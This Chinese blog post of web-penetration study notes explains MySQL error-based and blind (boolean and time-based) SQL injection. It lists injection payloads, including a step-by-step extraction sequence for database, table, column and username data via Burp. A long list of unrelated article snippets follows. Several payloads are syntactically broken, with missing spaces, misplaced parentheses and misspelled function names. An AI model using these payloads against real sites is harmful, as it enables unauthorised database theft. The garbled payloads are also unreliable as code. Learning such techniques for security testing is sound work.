林林木林林L
林林木林林L

WEB渗透学习笔记3——报错注入和盲注

报错注入

报错注入原理

在MYSQL中使用一些指定的函数来制造报错,后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端,从而从报错信息中获取设定的信息。select/insert/update/delete都可以使用报错来获取信息

常用的报错函数

  • updatexml()

    updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数;

    and updatexml(xml_document,Xpathstring,new_value)

    • updatexml(1,concat(0x7e,([select] database()),0x7e),1)
      • xml_document:xml标记,可以是任意值
      • Xpathstring:显示输出的信息,正确的是路径xx/xxx/x
      • new_value:替换找到的符合条件的数据

  • extractvalue()

    extractvalue()函数也是MYSQL对XML文档数据进行查询的XPATH函数;

    正确的应该显示xml路径xx/xxx,但是我们要报错注入,所以就要故意输错以此来显示数据库报错信息

    • and extractvalue(1,concat(0x7e,(select database())))

  • floor()

    • and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

  • name_const()

    • and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

  • join

    • select * from(select * from mysql.user ajoin mysql.user b)c

  • exp()

    • and exp(~(select * from (select user () ) a) )

  • GeometryCollection()

    • and GeometryCollection(()select *from(select user () )a)b )

  • polygon()

    • and polygon (()select * from(select user ())a)b )

  • multipoint

    • and multipoint (()select * from(select user() )a)b )

  • multlinestring()

    • and multlinestring (()select * from(selectuser () )a)b )

  • multpolygon()

    • and multpolygon (()select * from(selectuser () )a)b )

  • linestring()

    • and linestring (()select * from(select user() )a)b )

盲注

有些情况下,开发人员屏蔽了报错信息,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为盲注。 盲注根据展现方式,分为boolean型盲注和时间型盲注

  • 当没有任何报错信息,没有任何输出的时候,只能使用盲注

Boolean盲注原理

Boolean是基于真假的判断(true or false); 不管输入什么,结果都只返回真或假两种情况; 通过and 1=1和and 1=2可以发现注入点

Boolean型盲注的关键在于通过表达式结果与已知值进行比对,根据比对结果 判断正确与否

Boolean盲注的判断方式

  • 通过长度判断:length():length(database())>=x
  • 通过字符判断:substr():substr(database(),1,1) =‘s’
  • 通过ascII码判断:ascii():ascii(substr(database(),1,1)) =x

Boolean盲注攻击

  1. 判断注入类型
  2. 判断数据库名长度:and length(database())>=8
  3. Burp爆库名:and substr(database(),1,1)=‘a’ --+
  4. Burp爆表名:and substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)=‘a’ --+
  5. Burp爆字段名:and substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),1,1)=‘a’ --+
  6. Burp爆数据:and substr((select username from security.users limit 0,1),1,1)=‘a’ --+

时间盲注原理

代码存在sql注入漏洞,然而页面既不会回显数据,也不会回显错误信息,语句执行后也不提示真假,我们不能通过页面的内容来判断。这里我们可以通过构造语句,通过页面响应的时长,来判断信息,这既是时间盲注

利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3) 语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果 expr1是True,则返回expr2,否则返回expr3

时间盲注判断方式

输入两种类型语句 看哪个有延迟反应就是对应的类型

  • 字符型:'and sleep(5) --+

  • 数值型:and sleep(5)

时间盲注常用函数

• left(m,n) --从左向右截取字符串m返回其前n位

• substr(m,1,1) --取字符串m的左边第一位起,1字长的字符串

• ascii(m) --返回字符m的ASCII码

• if(str1,str2,str3)–如果str1正确就执行str2,否则执行str3

• sleep(m)–使程序暂停m秒

• length(m) --返回字符串m的长度

• count(column_name) --返回指定列的值的数目

时间盲注攻击

  1. 判断注入类型

  2. 判断数据库名长度:and if(length(database())>=6,sleep(5),1)

  3. Burp爆库名:and if(substr(database(),1,1)=‘a’,sleep(5),1)

  4. Burp爆表名:and if(substr((select table_name from information_schema.tables where table_schema=‘test’ limit 0,1),1,1)=‘a’,sleep(5),1)

  5. Burp爆字段名:and if(substr((select column_name from information_schema.columns where table_schema=‘test’ and table_name=‘users’ limit

    0,1),1,1)=‘a’,sleep(5),1)

  6. Burp爆数据:and if(substr(select username from test.users limit 0,1),1,1)=‘a’,sleep(5),1)

你可能感兴趣的:(数据库,web,sql)

  • linux初始mysql_linux mysql初始化 隔壁王医生 linux初始mysql
    一、mysql_install_db说明当MySQL的系统库(mysql系统库)发生故障或需要新加一个mysql实例时,需要初始化mysql数据库。需要使用的命令:/usr/local/mysql/bin/mysql_install_db#/usr/local/mysql/bin/mysql_install_db--help可以查看帮助信息如下Usage:/usr/local/mysql/bin/
  • Python 库的记录 weixin_40895135 python
    GitHub-jobbole/awesome-python-cn:Python资源大全中文版,内容包括:Web框架、网络爬虫、网络内容提取、模板引擎、数据库、数据可视化、图片处理、文本处理、自然语言处理、机器学习、日志、代码分析等环境管理管理Python版本和环境的工具p–非常简单的交互式python版本管理工具。pyenv–简单的Python版本管理工具。Vex–可以在虚拟环境中执行命令。vir
  • 修改mysql初始密码 「已注销」 数据库mysqljava
    查看当前MySQL登录密码[root@liwenjingmysql]#greppassword/var/log/mysqld.log2022-09-22T19:20:12.368849Z6[Note][MY-010454][Server]Atemporarypasswordisgeneratedforroot@localhost:mmxuyPx%+2hC当前登录密码为:mmxuyPx%+2hC执行
  • 第20节课: jQuery基础—简化JavaScript编程的强大工具 学问小小谢 HTML学习javascriptjquery前端html学习交互搜索引擎
    目录jQuery简介为什么使用jQuery?jQuery选择器基本选择器属性选择器伪类选择器事件处理事件绑定常见事件类型事件触发动画效果基本动画自定义动画实践:使用jQuery增强网页交互示例:创建一个带有动画效果的按钮示例:创建一个交互式的导航菜单结语在Web开发中,JavaScript是实现网页交互和动态效果的核心语言。然而,原生JavaScript的语法有时显得繁琐,为了提高开发效率,jQu
  • 构建新纪元:Gradle中Kotlin插件的配置全指南 2402_85758936 kotlin开发语言android
    构建新纪元:Gradle中Kotlin插件的配置全指南引言Kotlin,这门现代、简洁的语言,正在逐渐成为Java平台的有力补充。随着Kotlin在Android开发中的广泛采用,以及对服务器端和Web开发的支持,Kotlin插件在Gradle中的配置变得尤为重要。本文将深入探讨如何在Gradle中配置Kotlin插件,以充分利用Kotlin语言的强大功能。Kotlin与Gradle插件Kotli
  • 代替Winform、Win32控件的一些界面框架Electron,QT等 专注VB编程开发20年 前端c++ui界面框架
    以下是一些可以代替Winform、Win32控件,在VC++、VBA等EXE程序上用来做控件元素、表格数据绑定、窗口显示的WEBUI框架和工具:1.Electron特点:Electron是一个使用JavaScript、HTML和CSS构建跨平台桌面应用程序的框架。它允许开发者使用Web技术来创建桌面应用,具有良好的跨平台兼容性。适用场景:适用于需要快速开发跨平台桌面应用的场景,尤其是对UI灵活性和
  • FastAPI:一个贼快的Python Web框架 程序媛千千 fastapipython
    Python,作为一个强大而灵活的编程语言,提供了多种框架来简化Web开发过程。其中,FastAPI是一个很新但极其强大的库,它允许开发者以极简的代码高效地构建API。什么是FastAPI?FastAPI是一个现代、快速(高性能)的Web框架,用于构建API与Web应用程序。它基于标准Python类型提示这一特性,提供了多项功能,如数据验证、序列化、文档生成等。为什么选择FastAPI?速度:Fa
  • 深入探索SQL中修改表字段属性的技巧与策略 不一样的信息安全 数据库oraclesql
    摘要在SQL中,修改表字段属性是一项常见的数据库管理任务。用户可以调整字段的数据类型、长度、默认值或注释,而无需更改字段名称。例如,varchar类型可转换为mediumtext或text,NVARCHAR2类型可转换为NCLOB。若需同时变更字段名称及其属性,亦可通过特定SQL语句实现。此外,修改字段的默认值同样可行。这些操作有助于优化数据库结构,提升数据存储和查询效率。关键词SQL修改字段,数
  • 用SpringBoot+mysql+html实现ATM 系统总结与扩展 SAFE20242034 #SpringBootspringbootmysqlhtml
    这里写目录标题ATM系统总结与扩展项目概述主要功能模块1.用户注册2.用户登录3.账户查询4.存款与取款5.转账6.修改密码7.销户系统改进建议功能扩展技术优化完整代码实现数据库表设计后端代码(SpringBoot示例)1.Account实体类2.AccountRepository接口3.AccountController类前端代码(HTML+JavaScript示例)实际开发与部署步骤**1.开
  • Invocation of init method failed; nested exception is java.sql.SQLException: com.mysql.cj.jdbc.Drive weixin_42277889 mysqljavasql
    代码更新后连不上数据库,前天都还可以,现在不行了,一直报错mysql没有。Pom文件全局搜也灭有。一开始是查不到的,但是实际上pom文件中引入了,maven没有更新。。。。
  • spring mvc java 8 rest idea_springmvc学习笔记---面向移动端支持REST API 射命丸咲 springmvcjava8restidea
    前言:springmvc对注解的支持非常灵活和飘逸,也得web编程少了以往很大一坨配置项.另一方面移动互联网的到来,使得RESTAPI变得流行,甚至成为主流.因此我们来关注下springmvc对restapi的支持程度,以及需要做的工作评估.样例设计和准备:springmvc学习笔记系列的文章目录:•idea创建springmvc项目RESTAPI的设计原则遵循之前的博文来实现•移动互联网实战--
  • 用友NC checkekey SQL 注入漏洞 403_found 漏洞复现sql数据库
    免责声明本文旨在提供有关特定漏洞的深入信息,帮助用户充分了解潜在的安全风险。发布此信息的目的在于提升网络安全意识和推动技术进步,未经授权访问系统、网络或应用程序,可能会导致法律责任或严重后果。因此,作者不对读者基于本文内容所采取的任何行为承担责任。读者在使用本文信息时,必须严格遵循适用的法律法规及服务协议,自行承担一切风险与责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。一,产品
  • 基于 Spring 的本地事务管理 可儿·四系桜 java数据库
    1.什么是本地事务?本地事务是指在单一数据库系统内执行的一组操作,这些操作要么全部完成,要么全部不执行,是一个不可分割的工作单元。本地事务具有ACID特性:原子性(Atomicity):事务中的所有操作都作为一个整体提交或回滚;如果事务的一部分失败,则整个事务都会被撤销。一致性(Consistency):事务将数据库从一个一致状态转换到另一个一致状态,确保数据的完整性和规则得到遵守。隔离性(Iso
  • python多线程并发加速 AI算法网奇 python宝典mysqlpython基础数据库
    目录python多线程并发加速多线程例子打印线程号,进程号由于Python的全局解释器锁(GIL)限制,在CPU密集型任务中多线程的效果并不理想,但对于I/O密集型任务,多线程仍然是有效的。python多线程并发加速python多线程并发遍历数据库,然后查询历史记录,然后分析数据查询100ms,这时需要3分钟,加了并发处理后,需要1.2分钟后来数据库加了索引,需要6秒就可以了,总结:加索引能带来3
  • Python语言的安全开发 慕璃嫣 包罗万象golang开发语言后端
    Python语言的安全开发引言在信息技术迅速发展的今天,网络安全问题愈发凸显。随着Python语言的广泛应用,尤其是在数据分析、人工智能、Web开发等领域,其安全问题越来越受到重视。Python作为一门高效且易于学习的编程语言,虽然在开发过程中为我们提供了很多便利,但如果忽视了安全性,将可能导致严重的安全漏洞和数据泄露等问题。因此,本文将围绕Python语言的安全开发展开讨论,重点分析常见的安全问
  • 全面解析文件包含漏洞:原理、危害与防护 垚垚 Securify 前沿站 十大漏洞网络安全web安全系统安全网络安全
    目录前言漏洞介绍漏洞原理产生条件攻击方式造成的影响经典漏洞介绍防御措施结语前言在当今复杂的网络安全环境中,文件包含漏洞就像潜藏在暗处的危险陷阱,随时可能对防护薄弱的Web应用发起致命攻击。随着互联网的迅猛发展,各类Web应用如雨后春笋般涌现,文件包含漏洞也随之成为Web应用安全的一大隐患。深入了解文件包含漏洞的原理、危害及防范措施,对于保障网络安全、维护数据隐私以及确保系统稳定运行至关重要。漏洞介
  • java 重定向后的接口得到两个cookie 小泉水 java开发语言
    HTTP相关视频讲解:零拷贝的原理Java重定向后的接口得到两个cookie在Web开发中,重定向是一种常见的操作,通过重定向可以实现页面跳转、处理表单提交等功能。在Java中,我们通常使用HttpURLConnection或者HttpClient等工具来发送HTTP请求和接收响应。本文将介绍如何在Java中发送HTTP请求并处理重定向后得到的两个cookie。HTTP请求和重定向HTTP协议是一
  • 二、React进阶 谁诉离殇~ 框架(level1)#React系列(level2)#react(level3)react.jsjavascript
    一、代码分割为什么要使用代码分割:在用webpack进行打包的时候,每个模块被导入合并在一个文件,这个文件叫做bundle,这些bundle在一张页面上包括了整个APP。然而,当APP增长的时候,这些bundle尺寸开始变得越来越大,因此影响了页面加载时间使用antdesignpro的时候,打包出来的不是一个bundle文件,而是把每个模块打包成了一个async.js。如果用了代码拆分中的impo
  • ThreeJS入门(233):THREE.DirectionalLightHelper 知识详解,示例代码 还是大剑师兰特 #ThreeJS中文API全解大剑师threejs入门threejs教程threejs示例
    作者:还是大剑师兰特,曾为美国某知名大学计算机专业研究生,现为国内GIS领域高级前端工程师,CSDN知名博主,深耕openlayers、leaflet、mapbox、cesium,webgl,ThreeJS,canvas,echarts等技术开发,欢迎加微信(gis-dajianshi),一起交流。查看本专栏目录-本文是第233篇入门文章文章目录特性构造函数方法`update()`使用示例注意事项
  • React使用less语法 世间万物皆对象 reactnpmwebpackreact.jsless前端
    1.安装yarnaddlessless-loaderornpmilessless-loader2.打开webpack配置文件创建项目的时候我们是看不到webpack文件的需要暴露出来yarnejectornpmruneject3.配置less语法环境在config文件下找到webpack.config.js文件打开webpack.config.js找到如下图:在下面添加如下两句代码:constle
  • DM数据库体系结构详解 weixin_46474599 达梦数据库
    数据库体系结构分成四个部分,分别是DM逻辑结构,DM物理存储结构,DM内存结构,管理DM线程。DM逻辑结构:1.DM数据库和实例的联系与区别(1)DM数据库指的是磁盘上存放在DM数据库中的数据的集合,一般包括:数据文件、日志文件、控制文件以及临时数据文件等。(2)实例一般是由一组正在运行的DM后台进程/线程以及一个大型的共享内存组成。简单来说,实例就是操作DM数据库的一种手段,是用来访问数据库的内
  • mysql.sock.lock的作用_不能创建 mysql.sock.lock是怎么回事 0110君
    15052003:26:57mysqld_safeStartingmysqlddaemonwithdatabasesfrom/usr/local/mysql/data2015-05-20T03:26:58.070269Z0[Warning]TIMESTAMPwithimplicitDEFAULTvalueisdeprecated.Pleaseuse--explicit_defaults_for_t
  • mysql.sock.lock的作用,[轉帖]mysql.sock的作用 彩彩彩虹
    2、socketmysql.sock的作用是server和client在同一台服務器,並且使用localhost進行鏈接的時候,就會使用socket來進行連接——僅此而已也就是:為主機名為localhost建立的MySQL連接,該連接過程通過一個套接字文件mysql.socket實現的。所以該文件被刪后,用localhost用戶是連接不到MySQL服務器的。必須建立一條tcp/ip連接,即使用12
  • DM数据库体系结构介绍 星星有泪了 数据库
    1、DM逻辑结构DM数据库为数据库中的所有对象分配逻辑空间,并存放在数据文件中。在DM数据库内部,所有的数据文件组合在一起被划分到一个或者多个表空间中,所有的数据库内部对象都存放在这些表空间中。同时,表空间被进一步划分为段、簇和页(也称块)。通过这种细分,可以使得DM数据库能够更加高效地控制磁盘空间的利用率。下图显示了这些数据结构之间的关系。在DM8中存储的层次结构如下:数据库由一个或多个表空间组
  • MongoDB 大俗大雅,上来问分片真三俗 -- 4 分什么分 Austindatabases mongodb数据库
    开头还是介绍一下群,如果感兴趣PolarDB,MongoDB,MySQL,PostgreSQL,Redis,OceanBase,SqlServer等有问题,有需求都可以加群群内有各大数据库行业大咖,可以解决你的问题。加群请联系liuaustin3,(共2710人左右1+2+3+4+5+6+7+8+9)(123456群均已爆满,7群400+,开8群9群)这是MongoDB宣传周的第五篇,这周真漫长,
  • 企业技术架构图 iteye_14949 企业架构图技术架构图
    发布一企业技术架构图,供大家参考。该技术架构图是本人根据多年企业技术架构经验而制定,是企业技术的总架构图,希望对CTO们有所借鉴。简单说明:1.中间件基础运行环境是经过统一规划的以WebLogic、JBOSS为主的集群环境2.企业集成平台是以基础业务应用为基础服务于上层平台和基础业务应用的高度集成平台3.数据中心是企业公共数据的集中管理比如用户数据、企业编码,可以通过数据集成平台或服务集成平台分发
  • 数据库索引(1) 比特知识工坊 MySQL专栏数据库adb
    数据库索引1.索引介绍索引是一种特殊的数据库结果,由数据表中的一列或多列组合而成,可以用来快速查询数据表中某一些特定值的记录。通过索引,查询数据是不用读完记录的所有信息,而只是查询索引列。否则,数据库系统将读取每条记录的所有信息进行匹配。可以把索引必做新华字典的音序表。例如,要查‘‘库’’字,如果不使用音序,就需要从字典的400页中逐页来找,但是,如果提取拼音出来,构成音序表,就只需要从10多页的
  • DM数据库体系架构 小蜗牛_ 数据库
    目录一、逻辑存储结构二、物理存储结构三、内存结构3.1内存池3.2缓冲区3.3排序区3.4哈希区四、管理DM线程一、逻辑存储结构DM数据库为数据库中的所有对象分配逻辑空间,并存放在数据文件中。在DM数据库内部,所有的数据文件组合在一起被划分到一个或者多个表空间中,所有的数据库内部对象都存放在这些表空间中。同时,表空间被进一步划分为段、簇和页(也称块)。通过这种细分,可以使得DM数据库能够更加高效地
  • spring 整合mybatis 出现解析不了配置文件的问题 yxlc_liushy mybatisspringmybatis3spring
    1,错误内容:org.springframework.beans.factory.BeanCreationException:Errorcreatingbeanwithname'sqlSessionFactory'definedinclasspathresource[spring/applicationContext.xml]:Invocationofinitmethodfailed;nested
  • mybatis项目@Insert注解批量插入数据库 执子手 吹散苍茫茫烟波 mysql框架mybatisannotationsmysql
    entitypackagecom.fanyu.mybatis.entity;/***CreatedwithIntelliJIDEA.**@Auther:cloudonthesun*@Date:2021/4/2615:59*@Description:*/publicclassTeacher{privateIntegerid;privateStringname;privateStringsex;pri
  • xml解析 小猪猪08 xml
    1、DOM解析的步奏 准备工作:    1.创建DocumentBuilderFactory的对象    2.创建DocumentBuilder对象    3.通过DocumentBuilder对象的parse(String fileName)方法解析xml文件    4.通过Document的getElem
  • 每个开发人员都需要了解的一个SQL技巧 brotherlamp linuxlinux视频linux教程linux自学linux资料
      对于数据过滤而言CHECK约束已经算是相当不错了。然而它仍存在一些缺陷,比如说它们是应用到表上面的,但有的时候你可能希望指定一条约束,而它只在特定条件下才生效。 使用SQL标准的WITH CHECK OPTION子句就能完成这点,至少Oracle和SQL Server都实现了这个功能。下面是实现方式: CREATE TABLE books (   id &
  • Quartz——CronTrigger触发器 eksliang quartzCronTrigger
    转载请出自出处:http://eksliang.iteye.com/blog/2208295 一.概述 CronTrigger 能够提供比 SimpleTrigger 更有具体实际意义的调度方案,调度规则基于 Cron 表达式,CronTrigger 支持日历相关的重复时间间隔(比如每月第一个周一执行),而不是简单的周期时间间隔。 二.Cron表达式介绍 1)Cron表达式规则表 Quartz
  • Informatica基础 18289753290 InformaticaMonitormanagerworkflowDesigner
    1. 1)PowerCenter Designer:设计开发环境,定义源及目标数据结构;设计转换规则,生成ETL映射。 2)Workflow  Manager:合理地实现复杂的ETL工作流,基于时间,事件的作业调度 3)Workflow  Monitor:监控Workflow和Session运行情况,生成日志和报告 4)Repository  Manager:
  • linux下为程序创建启动和关闭的的sh文件,scrapyd为例 酷的飞上天空 scrapy
    对于一些未提供service管理的程序  每次启动和关闭都要加上全部路径,想到可以做一个简单的启动和关闭控制的文件   下面以scrapy启动server为例,文件名为run.sh:   #端口号,根据此端口号确定PID PORT=6800 #启动命令所在目录 HOME='/home/jmscra/scrapy/' #查询出监听了PORT端口
  • 人--自私与无私 永夜-极光
                今天上毛概课,老师提出一个问题--人是自私的还是无私的,根源是什么?               从客观的角度来看,人有自私的行为,也有无私的
  • Ubuntu安装NS-3 环境脚本 随便小屋 ubuntu
      将附件下载下来之后解压,将解压后的文件ns3environment.sh复制到下载目录下(其实放在哪里都可以,就是为了和我下面的命令相统一)。输入命令:   sudo ./ns3environment.sh >>result   这样系统就自动安装ns3的环境,运行的结果在result文件中,如果提示     com
  • 创业的简单感受 aijuans 创业的简单感受
           2009年11月9日我进入a公司实习,2012年4月26日,我离开a公司,开始自己的创业之旅。      今天是2012年5月30日,我忽然很想谈谈自己创业一个月的感受。 当初离开边锋时,我就对自己说:“自己选择的路,就是跪着也要把他走完”,我也做好了心理准备,准备迎接一次次的困难。我这次走出来,不管成败
  • 如何经营自己的独立人脉 aoyouzi 如何经营自己的独立人脉
    独立人脉不是父母、亲戚的人脉,而是自己主动投入构造的人脉圈。“放长线,钓大鱼”,先行投入才能产生后续产出。   现在几乎做所有的事情都需要人脉。以银行柜员为例,需要拉储户,而其本质就是社会人脉,就是社交!很多人都说,人脉我不行,因为我爸不行、我妈不行、我姨不行、我舅不行……我谁谁谁都不行,怎么能建立人脉?我这里说的人脉,是你的独立人脉。   以一个普通的银行柜员
  • JSP基础 百合不是茶 jsp注释隐式对象
      1,JSP语句的声明 <%! 声明 %>    声明:这个就是提供java代码声明变量、方法等的场所。 表达式 <%= 表达式 %>    这个相当于赋值,可以在页面上显示表达式的结果, 程序代码段/小型指令 <% 程序代码片段 %>   2,JSP的注释   <!-- -->
  • web.xml之session-config、mime-mapping bijian1013 javaweb.xmlservletsession-configmime-mapping
    session-config 1.定义: <session-config> <session-timeout>20</session-timeout> </session-config> 2.作用:用于定义整个WEB站点session的有效期限,单位是分钟。   mime-mapping 1.定义: <mime-m
  • 互联网开放平台(1) Bill_chen 互联网qq新浪微博百度腾讯
    现在各互联网公司都推出了自己的开放平台供用户创造自己的应用,互联网的开放技术欣欣向荣,自己总结如下: 1.淘宝开放平台(TOP) 网址:http://open.taobao.com/ 依赖淘宝强大的电子商务数据,将淘宝内部业务数据作为API开放出去,同时将外部ISV的应用引入进来。 目前TOP的三条主线: TOP访问网站:open.taobao.com ISV后台:my.open.ta
  • 【MongoDB学习笔记九】MongoDB索引 bit1129 mongodb
    索引 可以在任意列上建立索引 索引的构造和使用与传统关系型数据库几乎一样,适用于Oracle的索引优化技巧也适用于Mongodb 使用索引可以加快查询,但同时会降低修改,插入等的性能 内嵌文档照样可以建立使用索引 测试数据     var p1 = { "name":"Jack", "age&q
  • JDBC常用API之外的总结 白糖_ jdbc
    做JAVA的人玩JDBC肯定已经很熟练了,像DriverManager、Connection、ResultSet、Statement这些基本类大家肯定很常用啦,我不赘述那些诸如注册JDBC驱动、创建连接、获取数据集的API了,在这我介绍一些写框架时常用的API,大家共同学习吧。     ResultSetMetaData获取ResultSet对象的元数据信息
  • apache VelocityEngine使用记录 bozch VelocityEngine
    VelocityEngine是一个模板引擎,能够基于模板生成指定的文件代码。   使用方法如下:     VelocityEngine engine = new VelocityEngine();// 定义模板引擎     Properties properties = new Properties();// 模板引擎属
  • 编程之美-快速找出故障机器 bylijinnan 编程之美
    package beautyOfCoding; import java.util.Arrays; public class TheLostID { /*编程之美 假设一个机器仅存储一个标号为ID的记录,假设机器总量在10亿以下且ID是小于10亿的整数,假设每份数据保存两个备份,这样就有两个机器存储了同样的数据。 1.假设在某个时间得到一个数据文件ID的列表,是
  • 关于Java中redirect与forward的区别 chenbowen00 javaservlet
    在Servlet中两种实现: forward方式:request.getRequestDispatcher(“/somePage.jsp”).forward(request, response); redirect方式:response.sendRedirect(“/somePage.jsp”); forward是服务器内部重定向,程序收到请求后重新定向到另一个程序,客户机并不知
  • [信号与系统]人体最关键的两个信号节点 comsci 系统
            如果把人体看做是一个带生物磁场的导体,那么这个导体有两个很重要的节点,第一个在头部,中医的名称叫做 百汇穴, 另外一个节点在腰部,中医的名称叫做 命门         如果要保护自己的脑部磁场不受到外界有害信号的攻击,最简单的
  • oracle 存储过程执行权限 daizj oracle存储过程权限执行者调用者
    在数据库系统中存储过程是必不可少的利器,存储过程是预先编译好的为实现一个复杂功能的一段Sql语句集合。它的优点我就不多说了,说一下我碰到的问题吧。我在项目开发的过程中需要用存储过程来实现一个功能,其中涉及到判断一张表是否已经建立,没有建立就由存储过程来建立这张表。 CREATE OR REPLACE PROCEDURE TestProc  IS    fla
  • 为mysql数据库建立索引 dengkane mysql性能索引
    前些时候,一位颇高级的程序员居然问我什么叫做索引,令我感到十分的惊奇,我想这绝不会是沧海一粟,因为有成千上万的开发者(可能大部分是使用MySQL的)都没有受过有关数据库的正规培训,尽管他们都为客户做过一些开发,但却对如何为数据库建立适当的索引所知较少,因此我起了写一篇相关文章的念头。  最普通的情况,是为出现在where子句的字段建一个索引。为方便讲述,我们先建立一个如下的表。
  • 学习C语言常见误区 如何看懂一个程序 如何掌握一个程序以及几个小题目示例 dcj3sjt126com c算法
    如果看懂一个程序,分三步   1、流程   2、每个语句的功能   3、试数   如何学习一些小算法的程序 尝试自己去编程解决它,大部分人都自己无法解决 如果解决不了就看答案 关键是把答案看懂,这个是要花很大的精力,也是我们学习的重点 看懂之后尝试自己去修改程序,并且知道修改之后程序的不同输出结果的含义 照着答案去敲 调试错误
  • centos6.3安装php5.4报错 dcj3sjt126com centos6
    报错内容如下: Resolving Dependencies --> Running transaction check ---> Package php54w.x86_64 0:5.4.38-1.w6 will be installed --> Processing Dependency: php54w-common(x86-64) = 5.4.38-1.w6 for
  • JSONP请求 flyer0126 jsonp
          使用jsonp不能发起POST请求。 It is not possible to make a JSONP POST request. JSONP works by creating a <script> tag that executes Javascript from a different domain; it is not pos
  • Spring Security(03)——核心类简介 234390216 Authentication
    核心类简介 目录 1.1     Authentication 1.2     SecurityContextHolder 1.3     AuthenticationManager和AuthenticationProvider 1.3.1  &nb
  • 在CentOS上部署JAVA服务 java--hhf javajdkcentosJava服务
        本文将介绍如何在CentOS上运行Java Web服务,其中将包括如何搭建JAVA运行环境、如何开启端口号、如何使得服务在命令执行窗口关闭后依旧运行     第一步:卸载旧Linux自带的JDK ①查看本机JDK版本 java -version    结果如下 java version "1.6.0"
  • oracle、sqlserver、mysql常用函数对比[to_char、to_number、to_date] ldzyz007 oraclemysqlSQL Server
    oracle                                &n
  • 记Protocol Oriented Programming in Swift of WWDC 2015 ningandjin protocolWWDC 2015Swift2.0
    其实最先朋友让我就这个题目写篇文章的时候,我是拒绝的,因为觉得苹果就是在炒冷饭, 把已经流行了数十年的OOP中的“面向接口编程”还拿来讲,看完整个Session之后呢,虽然还是觉得在炒冷饭,但是毕竟还是加了蛋的,有些东西还是值得说说的。 通常谈到面向接口编程,其主要作用是把系统设计和具体实现分离开,让系统的每个部分都可以在不影响别的部分的情况下,改变自身的具体实现。接口的设计就反映了系统
  • 搭建 CentOS 6 服务器(15) - Keepalived、HAProxy、LVS rensanning keepalived
    (一)Keepalived (1)安装 # cd /usr/local/src # wget http://www.keepalived.org/software/keepalived-1.2.15.tar.gz # tar zxvf keepalived-1.2.15.tar.gz # cd keepalived-1.2.15 # ./configure # make &a
  • ORACLE数据库SCN和时间的互相转换 tomcat_oracle oraclesql
    SCN(System Change Number 简称 SCN)是当Oracle数据库更新后,由DBMS自动维护去累积递增的一个数字,可以理解成ORACLE数据库的时间戳,从ORACLE 10G开始,提供了函数可以实现SCN和时间进行相互转换;    用途:在进行数据库的还原和利用数据库的闪回功能时,进行SCN和时间的转换就变的非常必要了;    操作方法:   1、通过dbms_f
  • Spring MVC 方法注解拦截器 xp9802 spring mvc
    应用场景,在方法级别对本次调用进行鉴权,如api接口中有个用户唯一标示accessToken,对于有accessToken的每次请求可以在方法加一个拦截器,获得本次请求的用户,存放到request或者session域。 python中,之前在python flask中可以使用装饰器来对方法进行预处理,进行权限处理 先看一个实例,使用@access_required拦截: ?
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他